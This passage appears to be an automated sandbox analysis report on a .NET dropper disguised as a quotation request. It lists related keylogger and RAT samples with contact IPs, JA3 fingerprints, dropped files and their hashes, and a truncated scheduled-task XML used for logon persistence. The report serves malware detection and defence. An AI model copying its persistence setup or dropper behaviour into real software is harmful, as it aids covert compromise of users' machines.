                                                                                                                                            14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                            • 132.226.247.73
                                                                                                                                            rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 132.226.247.73
                                                                                                                                            wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 132.226.247.73
                                                                                                                                            tNXl4XhgmV.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 132.226.247.73

                                                                                                                                            JA3 Fingerprints

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            54328bd36c14bd82ddaa0c04b25ed9adRemittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 104.21.112.1
                                                                                                                                            SOA.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                            • 104.21.112.1
                                                                                                                                            PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 104.21.112.1
                                                                                                                                            FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 104.21.112.1
                                                                                                                                            QUOTATION#090125-ELITEMARINE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                            • 104.21.112.1
                                                                                                                                            Order_list.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 104.21.112.1
                                                                                                                                            Receipt-2502-AJL2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 104.21.112.1
                                                                                                                                            Loader.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.21.112.1
                                                                                                                                            mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                            • 104.21.112.1
                                                                                                                                            aS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 104.21.112.1
                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eRemittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            ReanProject.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            https://email.mg.decisiontime.online/c/eJxszjFvszAQgOFfYzbQ-c4mMHj4pK_M3TqDOZdTjR1hJyj_vkqVMeujd3hXZxnHi2_Y6Qv1hohgaHifJbbhyHu75n2W5M7z7Fb2UiSnKjt3OUVJ_CqjpJ9WVoeoxwEvL62PKz9VN5szGsd5AQoLgV-oZ2_1oPuFgrWAvWnEIaAFDaM2ZGHoAsy0DGwY2VpNoAzs328fottqvRZF_xROCqeyFV_flQonDLPC6c6HhEfr8_q0v9vmcB9xlsTdl8SS0__8qQyUfKsbH6ket1K7rfgkXeLa3B3-BgAA__-9dmXGGet hashmaliciousUnknownBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            https://shortener.kountryboyzbailbonds.com/orVbdaZDUTFihPy?https://go.microsoft.com/ref=?ONSKE6784f8047cd90___store=ot&url=ONSKE6784f8047cd90&utm_source=follow-up-email&utm_medium=email&utm_campaign=abandoned%20helpful%20linkGet hashmaliciousUnknownBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            rRef6010273.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            invnoIL438805.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 149.154.167.220
                                                                                                                                            Shipping Docs Waybill No 2009 xxxx 351.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                            • 149.154.167.220

                                                                                                                                            Dropped Files

                                                                                                                                            No context

                                                                                                                                            Created / dropped Files

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION REQUIRED_Enatel s.r.l..bat.exe.log

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1216
                                                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vTAuFgZcVE.exe.log

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1216
                                                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2232
                                                                                                                                            Entropy (8bit):5.380805901110357
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:lylWSU4xymI4RjGoUP7gZ9tK8NPZHUm7u1iMuge//MPUyus:lGLHxvII1LZ2KRH9Ougss
                                                                                                                                            MD5:9EC965DA4B5A552C05CA371AAECAC883
                                                                                                                                            SHA1:1A26A04D746302689BE9E5392EB62437B0890702
                                                                                                                                            SHA-256:E8C19283224C6AD494CFEC5A3BE56A016EE022EA0A23770F2B3053352597E552
                                                                                                                                            SHA-512:A451B42CC48260E68D776363E3547415F0B33FAA9521993C4B31B35C1D81BB4F884831E8E4C4997AB4AE98783DD8AABEF60FDBAFE65DEF48D6B271AB32305D2A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.....................@.[8]'.\........System.Data.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cwndldbg.ksl.psm1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rcomc2lx.l0l.ps1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tfi5ipty.kwk.psm1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkm5uhfs.d21.ps1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp9C5C.tmp

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                                                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1583
                                                                                                                                            Entropy (8bit):5.115594213573785
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtExvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTUv
                                                                                                                                            MD5:AACDC6F58452308F338A33FB3050CC5D
                                                                                                                                            SHA1:F9E77D4B0D76A246A3A937D5BFE1F60DE7A3B314
                                                                                                                                            SHA-256:619D15E1AA0C2555670D34F3E3CD618F3E0715E14515AA1290217B25B8D17EA2
                                                                                                                                            SHA-512:875E70568130CD53F000A22D83FC0DED3C1082C0C78AECCF22B183EF29E589C089268C866C306D89E8F4BA5B9BF98FCC998F8B0E11BF8E5252F393973A773F2B
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpA824.tmp

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe
                                                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1583
                                                                                                                                            Entropy (8bit):5.115594213573785
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtExvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTUv
                                                                                                                                            MD5:AACDC6F58452308F338A33FB3050CC5D
                                                                                                                                            SHA1:F9E77D4B0D76A246A3A937D5BFE1F60DE7A3B314
                                                                                                                                            SHA-256:619D15E1AA0C2555670D34F3E3CD618F3E0715E14515AA1290217B25B8D17EA2
                                                                                                                                            SHA-512:875E70568130CD53F000A22D83FC0DED3C1082C0C78AECCF22B183EF29E589C089268C866C306D89E8F4BA5B9BF98FCC998F8B0E11BF8E5252F393973A773F2B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                                                                                                            C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):948224
                                                                                                                                            Entropy (8bit):7.76634166552624
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:c8yNK1t4NK1tOqLBPitz9yZJLjsqk488RBAUt6a:rhkLyZJLjs74Bv
                                                                                                                                            MD5:DAC368E84E853ADEC2A5BB1CD87CD1C6
                                                                                                                                            SHA1:139C10CFA59C1E25039C02671010009DE25A2690
                                                                                                                                            SHA-256:ECE7DE25D48E50E93D3D60F600A7676FE24A520916844F6826B4837AC8DD7EBC
                                                                                                                                            SHA-512:823336A9F2016C7144D863000606E45B839746163D4F921150C283021DD06C6DEF082B66660888FDC70141B989F9D01F4332D3D626C030C962453C78977FE9AC
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I.................0..n..........F.... ........@.. ....................................@....................................O...................................@h..p............................................ ............... ..H............text...\m... ...n.................. ..`.rsrc................p..............@..@.reloc...............v..............@..B................%.......H...........a......S........j...........................................0..L.........}.....(.......(......(............s .....(!....o".....(#....o$.....(%....*.0............}........(&........('.....,5...(............s .....(.....o".....(.....o$....85....r...p.Y...((...o)...tY.......(*..........9.....s.........s+...s,...o-......o!...r...po...........,$..(!.....o!...r...po....s....o/........o0...(1.......o2...(3.......o4...(5.......o6...(7.......o8...(9.......o:...(;.........

                                                                                                                                            C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe:Zone.Identifier

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):26
                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                            Static File Info

                                                                                                                                            General

                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Entropy (8bit):7.76634166552624
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                            File name:QUOTATION REQUIRED_Enatel s.r.l..bat.exe
                                                                                                                                            File size:948'224 bytes
                                                                                                                                            MD5:dac368e84e853adec2a5bb1cd87cd1c6
                                                                                                                                            SHA1:139c10cfa59c1e25039c02671010009de25a2690
                                                                                                                                            SHA256:ece7de25d48e50e93d3d60f600a7676fe24a520916844f6826b4837ac8dd7ebc
                                                                                                                                            SHA512:823336a9f2016c7144d863000606e45b839746163d4f921150c283021dd06c6def082b66660888fdc70141b989f9d01f4332d3d626c030c962453c78977fe9ac
                                                                                                                                            SSDEEP:24576:c8yNK1t4NK1tOqLBPitz9yZJLjsqk488RBAUt6a:rhkLyZJLjs74Bv
                                                                                                                                            TLSH:74150214374AEB13C0A65BF40821E2F467B86D8DA921D7078FDA3EEF7D367142984663
                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I.................0..n..........F.... ........@.. ....................................@................................

                                                                                                                                            File Icon

                                                                                                                                            Icon Hash:00928e8e8686b000

                                                                                                                                            Static PE Info

                                                                                                                                            General

                                                                                                                                            Entrypoint:0x4e8d46
                                                                                                                                            Entrypoint Section:.text
                                                                                                                                            Digitally signed:false
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                            Time Stamp:0x9F119049 [Mon Jul 27 01:26:33 2054 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:4
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:4
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:4
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                            Entrypoint Preview

                                                                                                                                            Instruction
                                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                                            call far 0000h : 003E9999h
                                                                                                                                            aas
                                                                                                                                            int CCh
                                                                                                                                            dec esp
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al

                                                                                                                                            Data Directories

                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xe8cf10x4f.text
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xea0000x594.rsrc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xec0000xc.reloc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xe68400x70.text
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
